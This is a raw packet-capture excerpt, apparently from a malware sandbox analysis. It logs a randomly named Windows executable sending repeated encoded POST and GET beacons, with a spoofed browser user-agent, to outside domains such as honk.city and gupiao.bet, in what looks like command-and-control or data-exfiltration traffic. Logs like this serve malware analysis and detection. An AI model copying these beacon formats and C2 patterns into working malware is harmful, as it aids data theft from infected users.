                                                                                                                                      Set-Cookie: vsid=908vr484130323111234078; expires=Thu, 10-Jan-2030 08:38:43 GMT; Max-Age=157680000; path=/; domain=www.regislemberthe.online; HttpOnly
                                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UQgn1IyGZPQ55Cusm3xlfY0brCLHKspycc3tml+FNVbURBa5Z+qy3j3T8FTF3MlKKYB7jA6YI7fvaCovGArY2Q==
                                                                                                                                      Content-Length: 2621
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 55 51 67 6e 31 49 79 47 5a 50 51 35 35 43 75 73 6d 33 78 6c 66 59 30 62 72 43 4c 48 4b 73 70 79 63 63 33 74 6d 6c 2b 46 4e 56 62 55 52 42 61 35 5a 2b 71 79 33 6a 33 54 38 46 54 46 33 4d 6c 4b 4b 59 42 37 6a 41 36
                                                                                                                                      Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_UQgn1IyGZPQ55Cusm3xlfY0brCLHKspycc3tml+FNVbURBa5Z+qy3j3T8FTF3MlKKYB7jA6
                                                                                                                                      Jan 11, 2025 09:38:44.007925034 CET1236INData Raw: 59 49 37 66 76 61 43 6f 76 47 41 72 59 32 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
                                                                                                                                      Data Ascii: YI7fvaCovGArY2Q=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><s
                                                                                                                                      Jan 11, 2025 09:38:44.007939100 CET1145INData Raw: 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                                                                                                                      Data Ascii: ntent="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=devi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      33192.168.2.45004113.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:49.063225031 CET693OUTPOST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 73 42 46 2f 67 6a 4f 7a 67 45 5a 68 35 45 4d 35 59 4a 36 38 67 33 45 72 4f 79 46 78 5a 54 52 46 64 6b 36 55 33 64 66 34 61 56 74 50 6c 77 6c 6d 4d 37 54 62 58 4b 38 36 75 6e 7a 33 76 61 54 37 71 45 53 6e 51 6e 5a 54 46 41 5a 76 71 79 71 6c 57 54 61 36 70 30 44 67 66 4a 79 61 66 6a 5a 2f 4d 62 47 71 44 74 42 52 5a 37 65 50 4f 41 70 6d 52 44 6b 31 73 57 39 2b 66 7a 74 57 31 73 78 4c 4c 63 6b 67 35 2f 33 35 4c 6f 56 2f 71 5a 37 6a 66 39 56 4c 78 56 6c 35 4f 4a 62 2f 44 4b 56 61 72 72 37 35 79 4d 6d 6a 44 2b 77 4c 4f 6d 56 73 56 30 30 77 64 77 3d 3d
                                                                                                                                      Data Ascii: sTS=o0J+MpKGqHuAsBF/gjOzgEZh5EM5YJ68g3ErOyFxZTRFdk6U3df4aVtPlwlmM7TbXK86unz3vaT7qESnQnZTFAZvqyqlWTa6p0DgfJyafjZ/MbGqDtBRZ7ePOApmRDk1sW9+fztW1sxLLckg5/35LoV/qZ7jf9VLxVl5OJb/DKVarr75yMmjD+wLOmVsV00wdw==
                                                                                                                                      Jan 11, 2025 09:38:49.504785061 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      34192.168.2.45004213.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:51.616745949 CET713OUTPOST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 31 46 64 42 65 55 32 63 66 34 62 56 74 50 74 51 6c 5a 52 72 54 41 58 4b 77 4d 75 6e 50 33 76 61 48 37 71 46 69 6e 51 30 42 53 45 51 5a 74 30 53 71 64 53 54 61 36 70 30 44 67 66 4a 6d 67 66 6a 42 2f 4d 71 32 71 43 4d 42 51 47 4c 65 41 4a 41 70 6d 47 54 6b 50 73 57 39 59 66 33 74 77 31 71 31 4c 4c 65 73 67 35 71 44 34 42 6f 56 78 30 70 36 4d 51 50 59 2f 32 67 59 51 52 4a 32 62 4b 59 68 72 75 74 32 6a 6a 39 48 30 52 2b 55 34 54 68 63 59 59 33 4a 35 47 37 6d 31 49 6b 65 6a 63 54 4f 6f 74 48 59 61 4e 64 49 42 6c 69 55 3d
                                                                                                                                      Data Ascii: sTS=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh1FdBeU2cf4bVtPtQlZRrTAXKwMunP3vaH7qFinQ0BSEQZt0SqdSTa6p0DgfJmgfjB/Mq2qCMBQGLeAJApmGTkPsW9Yf3tw1q1LLesg5qD4BoVx0p6MQPY/2gYQRJ2bKYhrut2jj9H0R+U4ThcYY3J5G7m1IkejcTOotHYaNdIBliU=
                                                                                                                                      Jan 11, 2025 09:38:52.055505037 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      35192.168.2.45004313.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:54.167208910 CET10795OUTPOST /c8xp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.honk.city
                                                                                                                                      Referer: http://www.honk.city/c8xp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 39 46 64 58 53 55 33 2f 33 34 4a 46 74 50 6a 77 6c 69 52 72 53 61 58 4b 70 46 75 6e 43 4b 76 59 2f 37 72 6a 57 6e 48 78 31 53 4b 51 5a 74 38 79 71 6d 57 54 61 72 70 30 54 6b 66 4a 32 67 66 6a 42 2f 4d 70 2b 71 4c 39 42 51 56 62 65 50 4f 41 70 69 52 44 6c 67 73 57 31 6d 66 33 70 47 31 61 56 4c 46 65 63 67 37 59 62 34 44 49 56 7a 31 70 36 55 51 50 55 67 32 67 73 36 52 4a 7a 2b 4b 62 39 72 75 4c 6e 61 6d 4e 33 70 50 76 38 58 46 44 41 69 51 30 68 34 4b 72 61 41 5a 45 47 39 66 7a 36 54 6f 30 39 67 49 2f 73 73 6b 31 39 65 4f 62 43 42 69 57 64 41 44 2b 45 43 70 4b 63 6e 2b 58 38 64 37 68 6c 57 35 4e 62 74 66 2b 72 51 4a 47 45 43 78 44 66 6d 45 4d 62 74 49 4c 44 6d 74 6f 47 42 50 6a 2b 54 52 71 4b 50 6b 31 34 48 42 32 6a 59 38 63 5a 6f 35 73 4a 61 64 76 38 77 6c 62 6c 54 47 6a 6d 59 6b 36 71 4f 55 70 55 65 43 78 71 31 66 34 58 47 2f 46 74 65 55 41 50 42 4e 45 39 2b 7a 36 [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh9FdXSU3/34JFtPjwliRrSaXKpFunCKvY/7rjWnHx1SKQZt8yqmWTarp0TkfJ2gfjB/Mp+qL9BQVbePOApiRDlgsW1mf3pG1aVLFecg7Yb4DIVz1p6UQPUg2gs6RJz+Kb9ruLnamN3pPv8XFDAiQ0h4KraAZEG9fz6To09gI/ssk19eObCBiWdAD+ECpKcn+X8d7hlW5Nbtf+rQJGECxDfmEMbtILDmtoGBPj+TRqKPk14HB2jY8cZo5sJadv8wlblTGjmYk6qOUpUeCxq1f4XG/FteUAPBNE9+z6VPdjNYfpPY7g8BOV3z4gVNwfL362b1S7mJUJbznAQ3F2XQQIbfPckuIoSyjFus2swbIDuESWvwyQ5eOAAW0Xz9yhJ4kVEqRhqip/GF6GKkwkLohBrY2TQ5ELYBbyTYAnsLh8yHdS8PYXD7UQxwjDiBPLdcz4ojnSrIjBKpyoE6A7hmb3y2YJ716M+s1+68HZmdsH4Txx1Hs/UAQGKPa5Nd14b1SOeT+leSUJqukruF8KOGgjMcOXwxKoAuTqx17i1VWIkqxq1y9TQxB9nQvOrM9YqxZiaQbKQeK1EcuWYvbso8xhtdhfXawOHuraYE0JkwruxjfdvQZYn7YCLgxqV/c8uxiyCpN2CKQ+PdXsAltBVrnKl+FQxS5kpDCUZ4hOwY/lXgmxZXtjFRg9UGlY2Dwco/3kwSNoyKuRaa1NwgqC0tppWRWTP8EOv9XcZ61U/7RnXtqSNkhqNcOVDI3PKYLi6NKgaHfgzMHPRuSnf9E3gaPAWdjMnCwQXjGUWHonGH7xzlqFBcLT7ZV4d0ErEn6KRTo5mc7ntkO7TewQ/f2JSdYO+jn9ZaiMXJSFhCMSkdkyT5nULIJUJGggAuUux3TFhpTlhx+fxLUDOj+GT3dplp+wrsbYrLBP2dxQOMhm/M4Q5oh7+KUT/M1bP/68xs8Z9BrVjbWEXR [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:38:54.612377882 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      36192.168.2.45004413.248.169.48804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:38:56.703665972 CET436OUTGET /c8xp/?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.honk.city
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:58.165707111 CET377INHTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:38:58 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 54 53 3d 6c 32 68 65 50 64 47 32 6a 45 32 46 36 41 6c 46 76 51 71 49 6e 55 4d 2b 37 31 73 6e 51 4b 2b 6c 69 45 39 74 47 56 74 49 61 69 46 4d 41 33 57 4f 2f 74 32 44 4a 47 35 6d 74 53 77 34 55 76 2f 6d 51 73 49 33 67 57 37 37 72 39 4c 4d 6d 7a 32 4b 4a 56 6b 73 43 67 67 70 38 48 53 56 62 57 2b 47 33 6b 58 77 65 70 2b 59 61 44 49 36 64 4b 4b 77 47 4e 38 44 59 34 34 3d 26 66 64 3d 43 72 5f 54 41 68 54 70 76 5a 61 4c 66 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf"}</script></head></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      37192.168.2.45004554.67.42.145804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:03.588176012 CET696OUTPOST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 76 79 42 63 58 30 2f 50 69 53 6d 73 4d 38 58 6a 74 54 77 36 55 61 62 66 6b 53 53 41 51 35 4a 52 6d 46 31 78 6b 63 79 53 49 39 42 2f 59 37 79 63 75 56 53 30 31 5a 75 53 4c 71 42 6b 5a 43 30 39 2b 6e 70 35 6f 54 32 57 41 69 59 37 35 6b 67 65 55 44 75 38 69 65 7a 75 48 68 63 37 6a 45 6f 33 31 6c 78 70 70 66 6f 6f 50 6d 57 72 74 49 7a 4f 67 62 5a 6b 50 57 66 45 70 4a 43 59 62 59 51 43 38 54 74 73 52 4a 2b 37 4b 43 66 69 5a 55 4f 62 4d 32 50 64 6f 2b 42 75 55 52 6e 48 6d 46 64 65 43 78 53 77 4b 73 6b 74 73 76 6b 66 6f 49 66 41 44 56 6f 57 48 77 3d 3d
                                                                                                                                      Data Ascii: sTS=oNwV17kuuQ7IvyBcX0/PiSmsM8XjtTw6UabfkSSAQ5JRmF1xkcySI9B/Y7ycuVS01ZuSLqBkZC09+np5oT2WAiY75kgeUDu8iezuHhc7jEo31lxppfooPmWrtIzOgbZkPWfEpJCYbYQC8TtsRJ+7KCfiZUObM2Pdo+BuURnHmFdeCxSwKsktsvkfoIfADVoWHw==
                                                                                                                                      Jan 11, 2025 09:39:04.165417910 CET336INHTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:04 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      38192.168.2.45004654.67.42.145804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:06.136496067 CET716OUTPOST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 64 52 6c 67 78 78 6e 65 61 53 4c 39 42 2f 54 62 79 64 7a 6c 53 2f 31 5a 71 61 4c 71 39 6b 5a 43 51 39 2b 69 56 35 6f 6b 43 58 41 79 59 35 2f 6b 67 63 51 44 75 38 69 65 7a 75 48 68 4a 51 6a 45 77 33 30 57 35 70 70 2b 6f 72 54 57 57 73 36 34 7a 4f 6b 62 5a 67 50 57 66 36 70 49 66 31 62 61 59 43 38 53 64 73 57 59 2b 34 46 43 66 6b 57 30 50 4e 48 44 32 51 6c 63 30 68 58 79 4c 79 73 31 51 36 48 33 66 71 62 64 46 36 2b 76 41 73 31 50 57 30 4f 57 56 66 63 30 63 66 61 36 41 4b 33 58 6a 56 4f 55 61 74 66 6d 36 7a 74 68 6b 3d
                                                                                                                                      Data Ascii: sTS=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLdRlgxxneaSL9B/TbydzlS/1ZqaLq9kZCQ9+iV5okCXAyY5/kgcQDu8iezuHhJQjEw30W5pp+orTWWs64zOkbZgPWf6pIf1baYC8SdsWY+4FCfkW0PNHD2Qlc0hXyLys1Q6H3fqbdF6+vAs1PW0OWVfc0cfa6AK3XjVOUatfm6zthk=
                                                                                                                                      Jan 11, 2025 09:39:06.714787960 CET336INHTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:06 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      39192.168.2.45004754.67.42.145804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:08.681613922 CET10798OUTPOST /t3a1/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.gupiao.bet
                                                                                                                                      Referer: http://www.gupiao.bet/t3a1/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 6f 4e 77 56 31 37 6b 75 75 51 37 49 70 53 78 63 45 6a 54 50 6b 79 6d 76 41 63 58 6a 6b 7a 77 2b 55 61 6e 66 6b 54 58 46 51 4c 6c 52 6c 57 4e 78 6c 2f 61 53 4b 39 42 2f 61 37 79 59 7a 6c 53 69 31 64 47 57 4c 71 77 5a 5a 45 55 39 2f 41 74 35 67 31 43 58 4b 79 59 35 79 45 67 66 55 44 75 74 69 65 6a 69 48 68 5a 51 6a 45 77 33 30 51 64 70 2b 2f 6f 72 41 47 57 72 74 49 7a 4b 67 62 5a 59 50 57 48 71 70 49 71 49 62 4b 34 43 38 79 4e 73 51 71 6d 34 4d 43 66 6d 58 30 50 46 48 44 7a 51 6c 63 6f 44 58 7a 2b 70 73 33 4d 36 4c 52 43 78 47 73 35 48 2f 73 67 4b 74 66 69 45 49 47 5a 2f 53 7a 49 62 57 49 6b 44 30 31 76 56 55 6d 72 5a 47 56 2b 6f 7a 6e 4a 35 69 73 4a 4d 67 2f 38 31 33 46 41 48 49 48 30 31 49 69 53 74 2b 4c 2f 4a 58 55 4c 6e 73 6c 78 64 64 4c 54 30 50 2f 4c 6a 38 2b 72 56 50 61 48 34 78 71 42 76 59 6c 31 32 37 6a 4b 2b 59 77 45 74 44 4b 55 76 78 46 6c 51 44 67 6a 35 70 30 41 70 70 46 6b 36 78 45 6c 6c 4e 77 77 34 33 58 64 45 6e 52 32 36 4b 31 62 77 6c 46 33 42 4d 67 6e 77 75 55 55 72 63 78 [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=oNwV17kuuQ7IpSxcEjTPkymvAcXjkzw+UanfkTXFQLlRlWNxl/aSK9B/a7yYzlSi1dGWLqwZZEU9/At5g1CXKyY5yEgfUDutiejiHhZQjEw30Qdp+/orAGWrtIzKgbZYPWHqpIqIbK4C8yNsQqm4MCfmX0PFHDzQlcoDXz+ps3M6LRCxGs5H/sgKtfiEIGZ/SzIbWIkD01vVUmrZGV+oznJ5isJMg/813FAHIH01IiSt+L/JXULnslxddLT0P/Lj8+rVPaH4xqBvYl127jK+YwEtDKUvxFlQDgj5p0AppFk6xEllNww43XdEnR26K1bwlF3BMgnwuUUrcx7Mk1TAzcAGskwotEKQsCW0uLR0/6r7jByt8p5qCxSofdSKU/d/SO7PHD/oNr79eysE5OgdNmPHfL4Vntp9iaJSkSb0o3x4ng54cd3lhghhmmxGnOKUP1VxyAqlUmAsoxVIezfYhut7DT//H9nCJhSUv/DWO54YMt7KgOSYzmmUqvcbszYLMLfzGJ8QBTkKwq4jq3yEn2nJ359LZh0DM9VD8r2U9MW2ZwfN1WjLxPE2pYcIy/zmiS2hiPECVyFABD8Mg20aiGscxMe0UmjZERyhUs+iW2m5xinnm17aWz3xxrSK7Zbel677G6xjq8u0vXfM9Yg36O0VBUuiGsKxQg3xjzDu3Gmlk1pYoPUjjF8D74vPNADQPUhvoSl66U4KVG2BkMZnE11WdJeD+cXFGwb1ScjGyJ6S7A4GKdFSsRUEhcyQcFW0cKlATItjIdBFx2DEAoIgJeGb9azCP52DClnoJ625s4CjvogBX4fRedlKNmM/T/n5gMZmUm6R8Rx/INgI5CQHtKrSUjnMvYaIX0MP5SUFfrncq5mjgEUxV2wP6B8qvQ2gAYfnKUFk9ZVxVSq4oRdjRdftkIB6SNEzZTLB0rzI1grztGSfblTA9R8PNTb2Syv0FuQDJ02KsJERzdPALhft0Kcn6nHNzKgWJmWrUoUeShbeg9rC [TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:39:09.277791023 CET336INHTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:09 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      strict-transport-security: max-age=2592000
                                                                                                                                      cache-control: private, no-cache, no-store, max-age=0
                                                                                                                                      expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                      location: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      40192.168.2.45004854.67.42.145804588C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:39:11.219958067 CET437OUTGET /t3a1/?fd=Cr_TAhTpvZaLf&sTS=lPY12PoV4Qu/vhxdPmr863TaLMXXpQ43UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE1B48htAcHyBpMzkQSoug0pxqUZhndEiNFY= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.gupiao.bet
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:39:11.812021971 CET336INHTTP/1.1 302 Found
                                                                                                                                      content-type: text/plain
                                                                                                                                      content-length: 0
                                                                                                                                      date: Sat, 11 Jan 2025 8:39:11 GMT
                                                                                                                                      x-frame-options: SAMEORIGIN
